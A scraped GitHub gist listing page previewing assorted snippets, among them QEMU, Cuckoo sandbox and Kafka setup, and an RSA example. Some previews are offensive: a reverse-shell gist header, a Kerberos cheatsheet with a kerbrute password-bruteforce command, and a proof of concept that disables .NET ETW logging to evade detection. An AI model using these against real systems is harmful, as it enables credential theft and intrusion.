Skip to content

Instantly share code, notes, and snippets.

View merlinxcy's full-sized avatar
🎯
Focusing

Xeldax merlinxcy

🎯
Focusing
176 followers · 279 following
View GitHub Profile
@xiangchu0
xiangchu0 / qemu-system-aarch64.txt
Created November 2, 2017 06:53
qemu-aarch64-launch-example
qemu-system-aarch64 -smp 2 -m 1024 -M virt -bios QEMU_EFI.fd -nographic \
-device virtio-blk-device,drive=image \
-drive if=none,id=image,file=xenial-server-cloudimg-arm64-uefi1.img \
-device virtio-blk-device,drive=cloud \
-drive if=none,id=cloud,file=cloud.img \
-netdev user,id=user0 -device virtio-net-device,netdev=user0 -redir tcp:2222::22 \
-cpu cortex-a57
@7MinSec
7MinSec / mostly_painless_cuckoo_sandbox_install.md
Last active July 21, 2022 02:27
Mostly painless Cuckoo Sandbox install

How to Build a Cuckoo Sandbox Malware Analysis System

I had a heck of a time getting a Cuckoo sandbox running, and below I hope to help you get one up and running relatively quickly by detailing out the steps and gotchas I stumbled across along the way. I mention this in the references at the end of this gist, but what you see here is heavily influenced by this article from Nviso

Build your Linux Cuckoo VM

  1. Setup a Ubuntu 16.04 64-bit desktop VM (download here) in VMWare with the following properties:
  • 100GB hard drive
  • 2 procs
  • 8 gigs of RAM
@BankSecurity
BankSecurity / Simple_Rev_Shell.cs
Last active May 6, 2024 06:24
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@yulewei
yulewei / btrace-users-guide.md
Last active December 2, 2021 04:16
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@JoshuaChi
JoshuaChi / kafka集群安全认证配置.md
Created July 4, 2019 03:10 — forked from fuyuntt/kafka集群安全认证配置.md

kafka 集群安全认证配置

本文主要介绍下 kafka 0.10.0 版如何实现sasl/plain认证机制及权限控制

kafka安全机制

kakfa 的安全机制主要分为两部分:

  • 身份认证(Authentication): 对客户端的身份进行认证
  • 权限控制(Authorization): 对topic级别的权限进行控制

kafka 身份认证

kafka 目前支持 SSL,SASL(Kerberos),SASL(PLAIN) 三种认证机制。

@SwitHak
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active February 9, 2024 14:42
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@JarLob
JarLob / hook_location_frida.js
Created March 14, 2020 09:04 — forked from Areizen/hook_location_frida.js
Frida script to fake location on Android
const simulated_latitude = 48.8534
const simulated_longitude = 2.3488
Java.perform(function(){
const Location = Java.use('android.location.Location')
var location = Location.$new("gps")
location.setLatitude(simulated_latitude)
location.setLongitude(simulated_longitude)
@sohamkamani
sohamkamani / rsa.go
Created April 12, 2020 17:31
Example of RSA encryption, decryption, signing, and verification in Go
package main
import (
"crypto"
"crypto/rand"
"crypto/rsa"
"crypto/sha256"
"encoding/base64"
"fmt"
)
@xpn
xpn / env_var_spoofing_poc.cpp
Created June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43